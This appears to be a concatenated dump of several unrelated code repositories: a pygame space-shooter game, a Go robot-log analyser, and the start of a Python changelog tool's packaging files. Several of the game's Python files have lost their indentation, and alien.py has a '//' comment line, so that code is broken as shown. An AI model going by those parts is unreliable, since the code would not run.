    ship = Ship(ai_settings, screen, images)
    stats = GameStats(ai_settings)
    sb = Scoreboard(ai_settings, screen, stats)
    counter = Counter(ai_settings, screen, stats)
    # Pre-populate the starfield and powerups if the game starts active.
    # BUG FIX: these calls previously omitted the required `images` argument
    # (create_stars/create_powerup take four parameters).
    if stats.game_active:
        gf.create_stars(ai_settings, screen, stars, images)
        gf.create_powerup(ai_settings, screen, powerups, images)
    # main game loop
    while True:
        gf.check_events(ai_settings, screen, stats, play_button, ship, bullets, sounds, images)
        gf.update_screen(ai_settings, screen, stats, sb, stars, ship, aliens, bullets,
                         play_button, counter, powerups, sounds)
        if stats.game_active:
            gf.update_bullets(ai_settings, screen, ship, aliens, bullets, sb, stats, sounds)
            gf.create_stars(ai_settings, screen, stars, images)
            gf.create_powerup(ai_settings, screen, powerups, images)
            gf.update_aliens(ai_settings, stats, screen, ship, aliens, bullets, images)
            gf.update_stars(stars, ai_settings)
            gf.update_powerup(powerups, ai_settings)
            gf.update_timer(ai_settings)
            gf.powerup_check(ship, powerups, ai_settings, images, sounds, stats)
            bullets.update()
            stars.update()
            powerups.update()
            aliens.update()
            ship.update(bullets, ai_settings, screen, ship, sounds, images)
        # Clear the frame buffer for the next iteration's drawing pass.
        screen.fill(ai_settings.bg_color)
        # screen.blit(BackGround.image, BackGround.rect)
run_game()
<file_sep>/bullet.py
import pygame
from pygame.sprite import Sprite
class BulletBase(Sprite):
    """Base class for all bullets fired from the ship.

    Owns position tracking, vertical movement, and drawing; subclasses
    customize the sprite image and any horizontal offset/drift.
    """
    def __init__(self, ai_settings, screen, ship, images):
        """Create a bullet at the ship's current nose position."""
        super(BulletBase, self).__init__()
        self.screen = screen
        self.image = images.bullet
        self.rect = self.image.get_rect()
        # Start centered on the ship, at its top edge.
        self.rect.centerx = ship.rect.centerx
        self.rect.top = ship.rect.top
        # Float copies of the position allow sub-pixel per-frame movement.
        self.x = float(self.rect.x)
        self.y = float(self.rect.y)
        self.color = ai_settings.bullet_color
        self.speed_factor = ai_settings.bullet_speed_factor
        # NOTE: always the level-1 damage value; the collision code currently
        # applies a flat 1 damage regardless.
        self.damage = ai_settings.bullet1_damage
        # Removed dead no-ops from the original: `self.color = self.color`
        # and `self.speed_factor += 0` had no effect.
    def update(self):
        """Move the bullet up the screen."""
        # Both axes are tracked as floats, but only the vertical component is
        # applied to the rect here; horizontal drift is handled by subclasses.
        self.x -= self.speed_factor
        self.y -= self.speed_factor
        self.rect.y = self.y
    def draw_bullet(self):
        """Blit the bullet at its current position."""
        self.screen.blit(self.image, self.rect)
class Bullet(BulletBase):
    """Level-1 bullet: a single straight shot with the default image."""
    def __init__(self, ai_settings, screen, ship, images):
        super().__init__(ai_settings, screen, ship, images)
class Bullet21(BulletBase):
    """Left bullet of the double shot, offset 10px left of the ship's center."""
    def __init__(self, ai_settings, screen, ship, images):
        super().__init__(ai_settings, screen, ship, images)
        self.rect.centerx -= 10
        self.image = images.bullet1
class Bullet22(BulletBase):
    """Right bullet of the double shot, offset 10px right of the ship's center."""
    def __init__(self, ai_settings, screen, ship, images):
        super().__init__(ai_settings, screen, ship, images)
        self.rect.centerx += 10
        self.image = images.bullet1
class Bullet31(BulletBase):
    """Center bullet of the triple shot; flies straight up."""
    def __init__(self, ai_settings, screen, ship, images):
        super().__init__(ai_settings, screen, ship, images)
        self.image = images.bullet2
class Bullet32(BulletBase):
    """Left bullet of the triple shot: starts offset left and drifts left."""
    def __init__(self, ai_settings, screen, ship, images):
        super().__init__(ai_settings, screen, ship, images)
        # Initial leftward offset proportional to bullet speed.
        self.rect.x -= self.speed_factor
        self.image = images.bullet21
    def update(self):
        """Move up via the base class, then drift left at 20% of that speed."""
        super().update()
        self.rect.x -= self.speed_factor*0.2
class Bullet33(BulletBase):
    """Right bullet of the triple shot: starts offset right and drifts right."""
    def __init__(self, ai_settings, screen, ship, images):
        super().__init__(ai_settings, screen, ship, images)
        # Initial rightward offset proportional to bullet speed.
        self.rect.x += self.speed_factor
        self.image = images.bullet22
    def update(self):
        """Move up via the base class, then drift right at 20% of that speed."""
        super().update()
self.rect.x += self.speed_factor*0.2<file_sep>/settings.py
import game_stats as stats
class Settings():
    """A class to store all of the game's tunable settings."""
    def __init__(self):
        """Initialize the default settings for a fresh game session."""
        # screen settings
        self.screen_width = 1000
        self.screen_height = 800
        # alien settings
        self.alien_speed = 1.5
        self.fleet_direction = 1
        self.fleet_drop_speed = 5
        self.aliens_allowed = 15
        # alien1 (basic enemy)
        self.alien_health = 1
        self.alien_points = 50
        # alien2 (tougher enemy, worth more points)
        self.alien2_health = 3
        self.alien2_points = 75
        # background color
        self.bg_color = (0, 0, 15)
        # bullet level: 1 = single, 2 = double, 3 = triple shot
        self.bullet_type = 1
        # bullet damage per level
        self.bullet1_damage = 1
        self.bullet2_damage = 2
        self.bullet3_damage = 3
        # bullet statistics
        self.bullets_allowed = 99
        self.bullet_speed_factor = 20
        # bullet aesthetics
        self.bullet_width = 1
        self.bullet_height = 3
        self.bullet_color = 10, 210, 92
        # autofire settings (frames between automatic shots)
        self.fire_cooldown = 0
        self.shoot_cooldown = 9
        self.autofire = False
        self.test = False
        # level settings
        self.next_level = 1
        # score settings (re-assigns alien_points set above, same value)
        self.alien_points = 50
        # time settings
        self.frame_count = 0
        self.total_seconds = 0
        # ship settings
        self.ship_invulnerability = 200
        self.counter = 0
        self.ship_speed_factor = 3
        self.max_speed = self.ship_speed_factor*3.5
        self.ship_acceleration = 1.1
        self.speed = self.ship_speed_factor
        self.ship_limit = 2
        # stars settings
        self.max_stars_speed = 10
        self.stars_allowed = 100
        # powerup settings (cooldowns measured in seconds of play time)
        self.powerup_allowed = 3
        self.powerup_cooldown = 5
        self.powerup_increase = 8
        self.autofire_timer = 0
        self.pierce_timer = 0
        self.pierce = 0
    def default_settings(self):
        """Reset progress-related settings for a new game.

        NOTE(review): several reset values differ from __init__ (e.g.
        aliens_allowed 20 vs 15, bullet_speed_factor 5 vs 20,
        bullets_allowed 3 vs 99) — confirm which baseline is intended.
        """
        # Duplicate assignments of next_level and alien_speed were removed;
        # the resulting state is identical to the original.
        self.next_level = 1
        self.alien_speed = 1
        self.aliens_allowed = 20
        self.frame_count = 0
        self.bullet_type = 1
        self.bullet_speed_factor = 5
        self.bullets_allowed = 3
        self.alien_points = 50
self.alien2_points = 75<file_sep>/sounds.py
import pygame
# Master volume (0.0-1.0) applied to every loaded sound effect below.
VOLUME = 0.2
class Sounds():
    """Loads every sound effect once and exposes them as attributes,
    all normalized to the module-wide VOLUME level."""
    def __init__(self):
        def _load(path):
            # Load one effect file and apply the shared volume.
            effect = pygame.mixer.Sound(path)
            pygame.mixer.Sound.set_volume(effect, VOLUME)
            return effect
        self.shipshot = _load('sounds/single.wav')
        self.shipshot2 = _load('sounds/double.wav')
        self.shipshot3 = _load('sounds/triple.wav')
        self.boom = _load('sounds/boom2.wav')
        self.hit = _load('sounds/hit.wav')
        self.extrabullet = _load('sounds/bullet.wav')
pygame.mixer.Sound.set_volume(self.extrabullet, VOLUME)<file_sep>/game_functions.py
import sys
import pygame
import time
from bullet import Bullet, Bullet21, Bullet22, Bullet31, Bullet32, Bullet33
from alien import Alien, Alien2
from star import Star
from powerup import Powerup
# Module-level frame clock and pacing constants used by update_timer().
clock = pygame.time.Clock()
frame_rate = 60
# NOTE(review): start_time appears unused in this module — confirm before removing.
start_time = 90
def check_events(ai_settings, screen, stats, play_button, ship, bullets, sounds, images):
    """Drain the pygame event queue and dispatch each event to its handler."""
    for event in pygame.event.get():
        kind = event.type
        if kind == pygame.QUIT:
            # Window closed: shut pygame down and exit the process.
            pygame.quit()
            sys.exit()
        elif kind == pygame.KEYDOWN:
            check_keydown_events(event, ai_settings, screen, ship, bullets, sounds, images)
        elif kind == pygame.KEYUP:
            check_keyup_events(event, ship)
        elif kind == pygame.MOUSEBUTTONDOWN:
            # A click may land on the Play button.
            click_x, click_y = pygame.mouse.get_pos()
            check_play_button(stats, play_button, click_x, click_y)
def check_play_button(stats, play_button, mouse_x, mouse_y):
    """Start the game and hide the cursor when the Play button is clicked."""
    clicked = play_button.rect.collidepoint(mouse_x, mouse_y)
    if clicked:
        stats.game_active = True
        pygame.mouse.set_visible(False)
def check_keydown_events(event, ai_settings, screen, ship, bullets, sounds, images):
    """Raise movement/fire flags in response to a key press."""
    key = event.key
    if key == pygame.K_RIGHT:
        ship.moving_right = True
    elif key == pygame.K_LEFT:
        ship.moving_left = True
    elif key == pygame.K_UP:
        ship.moving_up = True
    elif key == pygame.K_DOWN:
        ship.moving_down = True
    elif key == pygame.K_a:
        # Holding 'a' raises the fire flag; the ship fires on its own cooldown.
        ship.fire = True
        print(ship.fire)
def check_keyup_events(event, ship):
    """Clear movement/fire flags when a key is released."""
    key = event.key
    if key == pygame.K_RIGHT:
        ship.moving_right = False
    elif key == pygame.K_LEFT:
        ship.moving_left = False
    elif key == pygame.K_UP:
        ship.moving_up = False
    elif key == pygame.K_DOWN:
        ship.moving_down = False
    elif key == pygame.K_a:
        ship.fire = False
def update_screen(ai_settings, screen, stats, sb, stars, ship, aliens, bullets, play_button, counter, powerups, sounds):
    """Draw every visible object to the frame buffer and flip the display."""
    # redraw all bullets under ship
    for bullet in bullets.sprites():
        bullet.draw_bullet()
    # Show the Play button only while the game is inactive.
    if not stats.game_active:
        play_button.draw_button()
    sb.show_score()
    counter.show_score()
    counter.prep_score()
    ship.blitme()
    stars.draw(screen)
    aliens.draw(screen)
    powerups.draw(screen)
    pygame.display.flip()
    # Level progression is checked here every frame; it depends only on
    # ai_settings.frame_count, not on anything drawn above.
    level_up(ai_settings)
def fire_bullet(ai_settings, screen, ship, bullets, sounds, images):
    """Fire a volley matching the current bullet_type, if under the bullet cap.

    bullet_type 1 = single shot, 2 = double shot, 3 = spread triple shot.
    """
    if len(bullets) < ai_settings.bullets_allowed:
        # Only construct the sprites for the volley actually being fired;
        # the original built every variant (six sprites) on each shot.
        if ai_settings.bullet_type == 1:
            bullets.add(Bullet(ai_settings, screen, ship, images))
            sounds.shipshot.play()
        if ai_settings.bullet_type == 2:
            bullets.add(Bullet21(ai_settings, screen, ship, images),
                        Bullet22(ai_settings, screen, ship, images))
            sounds.shipshot2.play()
        if ai_settings.bullet_type == 3:
            bullets.add(Bullet31(ai_settings, screen, ship, images),
                        Bullet32(ai_settings, screen, ship, images),
                        Bullet33(ai_settings, screen, ship, images))
            sounds.shipshot3.play()
def update_bullets(ai_settings, screen, ship, aliens, bullets, sb, stats, sounds):
    """Drop bullets that exited the top of the screen, then resolve alien hits."""
    for bullet in list(bullets.copy()):
        if bullet.rect.bottom <= 0:
            bullets.remove(bullet)
    check_bullet_alien_collisions(ai_settings, screen, ship, aliens, bullets, sb, stats, sounds)
    # NOTE(review): an empty-fleet level_end hook existed here but was
    # commented out in the original.
def check_bullet_alien_collisions(ai_settings, screen, ship, aliens, bullets, sb, stats, sounds):
    """Apply bullet damage to overlapping aliens and score any kills.

    While the pierce powerup is active, bullets survive their collisions
    (dokill=False for both groups), so a bullet keeps damaging aliens it
    overlaps on every subsequent frame.
    """
    if ai_settings.pierce == 0:
        hit = pygame.sprite.groupcollide(bullets, aliens, True, False)
    else:
        hit = pygame.sprite.groupcollide(bullets, aliens, False, False)
    for bullet, aliens in hit.items():
        for alien in aliens:
            # Flat 1 damage per hit regardless of bullet.damage.
            alien.damage(1)
            # NOTE(review): presumably Alien.damage() lowers health and kills
            # the sprite itself; confirm whether `< 0` vs `<= 0` is intended.
            if alien.health < 0:
                stats.score += alien.points
                sb.prep_score()
                sounds.boom.play()
            else:
                sounds.hit.play()
def create_powerup(ai_settings, screen, powerups, images):
    """Spawn powerups once the elapsed-time cooldown has passed.

    The cooldown (in seconds) is pushed further into the future by
    powerup_increase after each spawn, so drops get rarer over time.
    """
    number_powerup_x = ai_settings.powerup_allowed
    for powerup_amount in range(number_powerup_x):
        if len(powerups) < number_powerup_x:
            # frame_count/60 is elapsed play time in seconds at the 60 FPS cap.
            if ai_settings.frame_count/60 >= ai_settings.powerup_cooldown:
                powerup = Powerup(ai_settings, screen, images)
                powerups.add(powerup)
                print("powerup spawned")
                ai_settings.powerup_cooldown += ai_settings.powerup_increase
def update_powerup(powerups, ai_settings):
    """Remove powerups that have fallen past the bottom of the screen."""
    fallen = [p for p in powerups.copy()
              if p.rect.bottom >= ai_settings.screen_height]
    for powerup in fallen:
        powerups.remove(powerup)
def update_stars(stars, ai_settings):
    """Remove stars that have scrolled off the bottom of the screen."""
    off_screen = [s for s in stars.copy()
                  if s.rect.bottom >= ai_settings.screen_height]
    for star in off_screen:
        stars.remove(star)
def create_stars(ai_settings, screen, stars, images):
    """Top the starfield back up to the configured star count."""
    target = ai_settings.stars_allowed
    # Add one star per missing slot; each Star picks its own random position.
    for _ in range(target):
        if len(stars) < target:
            stars.add(Star(ai_settings, screen, images))
def create_alien(ai_settings, screen, aliens, images):
    """Keep the alien group filled up to aliens_allowed.

    NOTE(review): each refill step adds one Alien AND one Alien2, so the
    group can end up one above aliens_allowed — confirm this is intended.
    """
    number_aliens_x = ai_settings.aliens_allowed
    for alien_amount in range(number_aliens_x):
        if len(aliens) < number_aliens_x:
            alien = Alien(ai_settings, screen, images)
            alien2 = Alien2(ai_settings, screen, images)
            aliens.add(alien)
            aliens.add(alien2)
def check_aliens_bottom(screen, aliens):
    """Despawn aliens that have flown past the bottom edge of the screen."""
    bottom_edge = screen.get_rect().bottom
    for alien in list(aliens.sprites()):
        if alien.rect.bottom >= bottom_edge:
            aliens.remove(alien)
def update_aliens(ai_settings, stats, screen, ship, aliens, bullets, images):
    """Refill and move the alien fleet, then resolve ship collisions."""
    create_alien(ai_settings, screen, aliens, images)
    aliens.update()
    # Circle-based collision between the ship and any alien costs a life.
    if pygame.sprite.spritecollide(ship, aliens, False, pygame.sprite.collide_circle):
        ship_hit(ai_settings, stats, screen, ship, aliens, bullets)
        print("ooh... ooohh.... *dies*")
    check_aliens_bottom(screen, aliens)
def update_timer(ai_settings):
    """Advance the frame counter, cap the frame rate, and return elapsed seconds.

    NOTE(review): the returned value is computed before the increment, so it
    lags the stored frame count by one frame.
    """
    total_seconds = ai_settings.frame_count // frame_rate
    ai_settings.frame_count += 1
    # Also limits the main loop to `frame_rate` FPS via the module-level clock.
    clock.tick(frame_rate)
    return total_seconds
def powerup_check(ship, powerups, ai_settings, images, sounds, stats):
    """Apply powerups collected by the ship and expire the timed pierce effect.

    Effects: 'autofire' shortens the fire cooldown (bonus score once the
    floor of 4 is reached), 'pierce' makes bullets pass through aliens for
    ~5 seconds, 'bullet' raises the bullet cap, 'speed' raises bullet speed,
    'double'/'triple' upgrade the shot pattern (extra bullets when already
    at that tier).
    """
    # Collect and consume every powerup currently touching the ship.
    hits = pygame.sprite.spritecollide(ship, powerups, True)
    for hit in hits:
        # hit.type is a one-element list from random.choices.
        if hit.type[0] == 'autofire':
            print(ai_settings.shoot_cooldown, ai_settings.fire_cooldown)
            if ai_settings.shoot_cooldown > 4:
                ai_settings.shoot_cooldown -= 1
            else:
                # Already at the minimum cooldown: award score instead.
                stats.score += 500
            # if not ai_settings.test:
            #     ai_settings.test = 1
            #     ai_settings.shoot_cooldown -= 5
            #     ai_settings.autofire_timer = int(ai_settings.frame_count/60)
            #     print(ai_settings.autofire_timer)
        if hit.type[0] == 'pierce':
            print("pierce bullet")
            ai_settings.pierce = 1
            # Record the pickup time (in seconds) to expire the effect below.
            ai_settings.pierce_timer = int(ai_settings.frame_count/60)
        if hit.type[0] == "bullet":
            print("extra bullet")
            sounds.extrabullet.play()
            ai_settings.bullets_allowed += 1
        if hit.type[0] == "speed":
            print("extra bullet speed")
            ai_settings.bullet_speed_factor += 0.5
        if hit.type[0] == "double":
            print("double shot")
            # Already at double: grant extra capacity instead of the upgrade.
            if ai_settings.bullet_type == 2:
                ai_settings.bullets_allowed += 2
            ai_settings.bullet_type = 2
        if hit.type[0] == "triple":
            print("triple shot")
            # Already at triple: grant extra capacity instead of the upgrade.
            if ai_settings.bullet_type == 3:
                ai_settings.bullets_allowed += 3
            ai_settings.bullet_type = 3
    # if ai_settings.test == 1:
    #     if int(ai_settings.frame_count / 60) - ai_settings.autofire_timer > 5:
    #         print("autofire ends")
    #         ai_settings.test = 0
    #         ai_settings.shoot_cooldown += 5
    # While pierce is active, swap to the pierce bullet art every frame and
    # restore the defaults once ~5 seconds have elapsed since pickup.
    if ai_settings.pierce == 1:
        images.pierce()
        if int(ai_settings.frame_count / 60) - ai_settings.pierce_timer > 5:
            print("pierce ends")
            ai_settings.pierce = 0
            images.default()
def level_up(ai_settings):
    """Advance to the next difficulty level every 1200 frames (20s at 60 FPS)."""
    ai_settings.meme = int(ai_settings.frame_count / 1200)
    if ai_settings.meme != ai_settings.next_level:
        return
    print("next level")
    # Rewards scale super-linearly with the level; difficulty scales linearly.
    bonus = int(ai_settings.next_level ** 1.2)
    ai_settings.alien_points += bonus
    ai_settings.alien2_points += bonus
    ai_settings.aliens_allowed += 5
    ai_settings.alien_speed += 0.20
    ai_settings.next_level = ai_settings.next_level + 1
def ship_hit(ai_settings, stats, screen, ship, aliens, bullets):
if stats.ships_left > 0:
stats.ships_left -= 1
print("lives left:" + str(stats.ships_left))
aliens.empty()
bullets.empty()
time.sleep(0.5)
if ai_settings.ship_invulnerability > ai_settings.counter:
ai_settings.counter += 1
else:
stats.game_active = False
pygame.mouse.set_visible(True)
stats.ships_left = ai_settings.ship_limit
aliens.empty()
bullets.empty()
ai_settings.default_settings()
print("game over, score: " + str(stats.score))
stats.score -= stats.score
ship.center_ship()
<file_sep>/ship.py
import game_functions as gf
import pygame
import pygame
RED = (255, 0, 0)
class Ship:
def __init__(self, ai_settings, screen, images):
"""get a ship and set its position"""
self.screen = screen
self.ai_settings = ai_settings
# load the ship image and get the rectangle of it
self.image = images.ship
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
# draw the ship at the bottom center of the screen
self.rect.centerx = self.screen_rect.centerx
self.rect.bottom = self.screen_rect.bottom
self.radius = 25
self.center = float(self.rect.centerx)
self.bottom = float(self.rect.bottom)
# movement flags
self.moving_right = False
self.moving_left = False
self.moving_up = False
self.moving_down = False
self.fire = False # autofire
def update(self, bullets, ai_settings, screen, ship, sounds, images):
"""update the ship movement depending on keypress"""
global speed
if self.moving_right and self.rect.right < self.screen_rect.right:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.center += speed
elif self.moving_left and self.rect.left > 0:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.center -= speed
elif self.moving_up and self.rect.top > self.screen_rect.top:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.rect.centery -= speed
elif self.moving_down and self.screen_rect.bottom > self.rect.bottom:
if speed <= ai_settings.max_speed:
speed *= ai_settings.ship_acceleration
self.rect.centery += speed
else:
speed = ai_settings.ship_speed_factor
# autofire
if self.fire and len(bullets) < ai_settings.bullets_allowed:
if ai_settings.fire_cooldown == ai_settings.shoot_cooldown:
ai_settings.fire_cooldown = 0
gf.fire_bullet(ai_settings, screen, ship, bullets, sounds, images)
else:
ai_settings.fire_cooldown = ai_settings.fire_cooldown + 1
self.rect.centerx = self.center
def center_ship(self):
self.center = self.screen_rect.centerx
self.rect.bottom = self.screen_rect.bottom
def blitme(self):
"""draw the ship at the created location"""
self.screen.blit(self.image, self.rect)
pygame.draw.circle(self.image, (255, 0, 255), self.rect.center, 25)
<file_sep>/images.py
import pygame
class Images():
def __init__(self):
self.bullet = pygame.image.load("images/bullet1.png")
self.bullet1 = pygame.image.load("images/bullet2.png")
self.bullet2 = pygame.image.load("images/bullet3.png")
self.bullet21 = pygame.image.load("images/bullet32.png")
self.bullet22 = pygame.image.load("images/bullet33.png")
self.ship = pygame.image.load('images/ship.png')
self.alien = pygame.image.load("images/alieneasy2.1.png")
self.alien2 = pygame.image.load("images/alien2.1.png")
self.star = pygame.image.load("images/star3.png")
self.powerup_images = {}
self.powerup_images["speed"] = pygame.image.load("images/bulletspeed.png")
self.powerup_images["bullet"] = pygame.image.load("images/bullet.png")
self.powerup_images["autofire"] = pygame.image.load('images/autofire.png')
self.powerup_images["pierce"] = pygame.image.load('images/pierce.png')
self.powerup_images["double"] = pygame.image.load("images/double.png")
self.powerup_images["triple"] = pygame.image.load("images/triple.png")
def default(self):
self.bullet = pygame.image.load("images/bullet1.png")
self.bullet1 = pygame.image.load("images/bullet2.png")
self.bullet2 = pygame.image.load("images/bullet3.png")
self.bullet21 = pygame.image.load("images/bullet32.png")
self.bullet22 = pygame.image.load("images/bullet33.png")
def pierce(self):
self.bullet = pygame.image.load("images/laserred.png")
self.bullet1 = pygame.image.load("images/laserred.png")
self.bullet2 = pygame.image.load("images/laserred.png")
self.bullet21 = pygame.image.load("images/laserred1.png")
self.bullet22 = pygame.image.load("images/laserred2.png")<file_sep>/counter.py
import pygame.font
class Counter():
def __init__(self, ai_settings, screen, stats):
self.screen = screen
self.screen_rect = screen.get_rect()
self.ai_settings = ai_settings
self.stats = stats
self.text_color = (204, 24, 63)
self.font = pygame.font.Font('fonts/kenvector_future_thin2.ttf', 26)
self.prep_score()
def prep_score(self):
"""Turn the score into a rendered image."""
seconds = int(self.ai_settings.frame_count/60)
miliseconds = int(self.ai_settings.frame_count%60)
score_str = (str(seconds) + ":" + str(miliseconds))
self.score_image = self.font.render(score_str, True, self.text_color,
self.ai_settings.bg_color)
# Display the score at the top right of the screen.
self.score_rect = self.score_image.get_rect()
self.score_rect.right = self.screen_rect.right - self.ai_settings.screen_width/2 + 25
self.score_rect.bottom = 40
def show_score(self):
self.screen.blit(self.score_image, self.score_rect)<file_sep>/README.md
# space-shooter
<h1> If you want to launch the game without python, use "shmup_installer.exe"</h1>
**pygame needed!**
**LAUNCH = alien_invasion.py**
gameplay options:
**Arrow keys - Movement**
**<kbd>A</kbd> - Fire**
Game gets slightly harder every 20 seconds, with increased kill score each level
The point of the game is simple: shoot aliens, score high, don't get hit.
Hold A and turn these poorly designed aliens to mush!!
There are powerups that can upgrade your arsenal.
You get three lives, once you lose them all, game ends.
<file_sep>/alien.py
import random
from pygame.sprite import Sprite
import pygame
RED = (255, 0, 0)
class BaseAlien(Sprite):
"""alien: skeleton body"""
def __init__(self, ai_settings, screen, images):
super(BaseAlien, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
# load the alien from the image
self.image = images.alien
self.rect = self.image.get_rect()
# start new alien from top left of the screen
self.rect.x = random.randint(35, ai_settings.screen_width-35)
self.rect.y = random.randint(-4 * ai_settings.screen_height,
-1 * ai_settings.screen_height)
# store the aliens position
self.x = float(self.rect.x)
self.y = float(self.rect.y)
self.radius = 20
// pygame.draw.circle(self.image, RED, self.rect.center, self.radius)
def blitme(self):
"""draw alien on screen"""
self.screen.blit(self.image, self.rect)
def check_edges(self):
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
def update(self):
# self.x += (self.ai_settings.alien_speed * self.ai_settings.fleet_direction)
# self.y += random.randint(self.ai_settings.alien_speed, 2*self.ai_settings.alien_speed)
self.y += self.ai_settings.alien_speed
self.rect.x = self.x
self.rect.y = self.y
def points(self):
return self.points()
def damage(self, amount):
self.health -= amount
if self.health < 0:
self.kill()
class Alien(BaseAlien):
def __init__(self, ai_settings, screen, images):
super().__init__(ai_settings, screen, images)
self.image = images.alien
self.health = ai_settings.alien_health
self.points = ai_settings.alien_points
class Alien2(BaseAlien):
def __init__(self, ai_settings, screen, images):
super().__init__(ai_settings, screen, images)
self.image = images.alien2
self.health = ai_settings.alien2_health
self.points = ai_settings.alien2_points
| f9c6690781f440ddd89566a88a2710522e018620 | [
"Markdown",
"Python"
] | 12 | Python | Dulet/shmup | 17162ce496f551b558871efd77edfba808ad2460 | 82fee176b36710dd249aad1cca67ad062d2f1713 |
refs/heads/master | <repo_name>lioda/infi-2017<file_sep>/parser.go
package main
import (
"bufio"
"errors"
"io"
)
type Parser struct {
Input io.Reader
parser *bufio.Scanner
}
func (p *Parser) Next() string {
if p.parser == nil {
p.parser = bufio.NewScanner(p.Input)
p.parser.Split(func(data []byte, atEOF bool) (advance int, token []byte, err error) {
if atEOF {
return advance, token, errors.New("end of file")
}
parsingLimit := "]"
advance = 0
result := ""
for read := ""; read != parsingLimit; {
if advance >= len(data) {
return 0, nil, nil
}
ad, t, _ := bufio.ScanRunes(data[advance:], atEOF)
read = string(t)
if read == "(" {
parsingLimit = ")"
}
result = result + read
advance = advance + ad
}
return advance, []byte(result), err
})
}
if p.parser.Scan() == false {
return "EOF"
}
result := p.parser.Text()
return result
}
<file_sep>/README.md
Code for resolving INFI 2017 challenge: https://aoc.infi.nl/
<file_sep>/anallog_test.go
package main
import (
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
func TestSimpleLog(t *testing.T) {
an := NewAnalLog(strings.NewReader("[0,0][1,1](1,0)(0,-1)(0,1)(-1,0)(-1,0)(0,1)(0,-1)(1,0)"))
assert.Equal(t, 2, an.CountBottlenecks())
}
<file_sep>/robot_test.go
package main
import (
"testing"
"github.com/stretchr/testify/assert"
)
func TestCreateRobot(t *testing.T) {
assert.Equal(t, Robot{12, 58}, NewRobot("[12,58]"))
}
func TestMoveRobot(t *testing.T) {
robot := Robot{12, 58}
robot.Move("(1,-1)")
assert.Equal(t, NewRobot("[13,57]"), robot)
}
<file_sep>/main.go
package main
import (
"fmt"
"os"
)
func main() {
file, _ := os.Open("log.txt")
analyser := NewAnalLog(file)
result := analyser.CountBottlenecks()
fmt.Printf("%d bootlenecks.\n", result)
}
<file_sep>/parser_test.go
package main
import (
"os"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
func TestParseRobots(t *testing.T) {
input := "[0,0][1,1]"
parser := Parser{Input: strings.NewReader(input)}
assert.Equal(t, "[0,0]", parser.Next())
assert.Equal(t, "[1,1]", parser.Next())
}
func TestParseRobotsAndCoordinates(t *testing.T) {
input := "[0,0][1,1](1,0)(0,-1)"
parser := Parser{Input: strings.NewReader(input)}
assert.Equal(t, "[0,0]", parser.Next())
assert.Equal(t, "[1,1]", parser.Next())
assert.Equal(t, "(1,0)", parser.Next())
assert.Equal(t, "(0,-1)", parser.Next())
assert.Equal(t, "EOF", parser.Next())
}
func TestParseLargeFile(t *testing.T) {
file, _ := os.Open("large_file.txt")
parser := Parser{Input: file}
count := 0
for token := parser.Next(); token != "EOF"; token = parser.Next() {
count++
}
assert.Equal(t, 690, count)
}
<file_sep>/robot.go
package main
import (
"regexp"
"strconv"
)
type Robot struct {
X, Y int
}
func NewRobot(token string) Robot {
r, _ := regexp.Compile("\\[([^,]*),([^,]*)\\]")
// fmt.Printf("%q\n", r.FindAllStringSubmatch(token, -1))
strings := r.FindAllStringSubmatch(token, -1)
x, _ := strconv.Atoi(strings[0][1])
y, _ := strconv.Atoi(strings[0][2])
return Robot{x, y}
}
func (r *Robot) Move(coordinates string) {
re, _ := regexp.Compile("\\(([^,]*),([^,]*)\\)")
strings := re.FindAllStringSubmatch(coordinates, -1)
x, _ := strconv.Atoi(strings[0][1])
y, _ := strconv.Atoi(strings[0][2])
r.X = r.X + x
r.Y = r.Y + y
}
<file_sep>/anallog.go
package main
import (
"fmt"
"io"
"reflect"
"strings"
)
type AnalLog struct {
Log io.Reader
robots []Robot
robotIndex int
grid [][]string
}
func NewAnalLog(reader io.Reader) *AnalLog {
maxX := 50
maxY := 30
grid := make([][]string, maxY)
for i, _ := range grid {
grid[i] = make([]string, maxX)
for j, _ := range grid[i] {
grid[i][j] = " "
}
}
return &AnalLog{Log: reader, grid: grid}
}
func (a AnalLog) findBottleneck() bool {
if a.robotIndex%len(a.robots) != 0 {
return false
}
for i, r1 := range a.robots {
for j, r2 := range a.robots {
if i != j && reflect.DeepEqual(r1, r2) {
a.grid[r1.Y][r1.X] = "X"
return true
}
}
}
return false
}
func (a *AnalLog) createRobot(init string) {
if a.robots == nil {
a.robots = []Robot{}
}
a.robots = append(a.robots, NewRobot(init))
}
func (a *AnalLog) moveRobot(coordinates string) {
index := a.robotIndex % len(a.robots)
a.robots[index].Move(coordinates)
a.robotIndex++
}
func (a *AnalLog) CountBottlenecks() (result int) {
parser := Parser{Input: a.Log}
for token := parser.Next(); token != "EOF"; token = parser.Next() {
if string(token[0]) == "[" {
a.createRobot(token)
continue
}
a.moveRobot(token)
if a.findBottleneck() {
result++
}
}
fmt.Println("Display AI Message:")
for _, row := range a.grid {
fmt.Println(strings.Join(row, " "))
}
return result
}
| fddbbf159fbd1d07e6c63ca128b4534196d46567 | [
"Markdown",
"Go"
] | 8 | Go | lioda/infi-2017 | 86908b4b5eb01bdec57bb262e7c2159f6c3bfb23 | 493a6feb7c402bef8ed6fb267223abfa60f49347 |
refs/heads/master | <repo_name>metwork-framework/git_history_to_changelog<file_sep>/setup.py
from setuptools import setup
from setuptools import find_packages
with open('requirements.txt') as reqs:
install_requires = [
line for line in reqs.read().split('\n')
if (line and not line.startswith('--')) and (";" not in line)]
with open("README.md") as f:
long_description = f.read()
#Version "0.0.0" will be replaced by CI when releasing
setup(
author="<NAME>",
author_email="<EMAIL>",
name='ghtc',
version="0.0.0",
license="BSD 3",
python_requires='>=3.6',
url="https://git.meteo.fr/dsi-dev-ws/ghtc",
description="ghtc service",
long_description=long_description,
long_description_content_type="text/markdown",
packages=find_packages(),
install_requires=install_requires,
include_package_data=True,
entry_points={
"console_scripts": [
"ghtc = ghtc.cli:main",
]
}
)
<file_sep>/ghtc/models.py
from typing import Optional, List, Dict
import enum
import time
from dataclasses import dataclass, field
UNRELEASED_TAG_TIMESTAMP = 9999999999
class ConventionalCommitType(enum.Enum):
OTHER = 0
BUILD = 1
CHORE = 2
